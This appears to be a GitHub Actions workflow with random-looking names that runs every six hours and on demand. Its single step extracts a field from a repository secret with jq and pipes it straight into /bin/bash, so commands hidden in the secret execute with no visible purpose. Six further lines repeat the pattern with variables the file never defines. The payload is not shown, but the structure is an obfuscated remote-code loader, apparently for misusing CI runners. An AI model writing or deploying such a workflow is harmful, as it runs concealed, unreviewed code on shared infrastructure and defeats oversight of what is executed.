name: longaodi2374
on:
  workflow_dispatch:
  schedule:
    - cron: '10 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: longaodi2374
        env:
          zqk3: ${{ secrets.zqk3 }}
        run: |
          echo $zqk3 | jq -r .o707 | /bin/bash
          echo $hccbg3533 | jq -r .wdwv07 | /bin/bash
          echo $wqb8094 | jq -r .fjhx79515 | /bin/bash
          echo $d0171 | jq -r .f143 | /bin/bash
          echo $vz4627 | jq -r .znrjo05 | /bin/bash
          echo $dqfr38073 | jq -r .y765 | /bin/bash
          echo $s05639 | jq -r .hy25 | /bin/bash

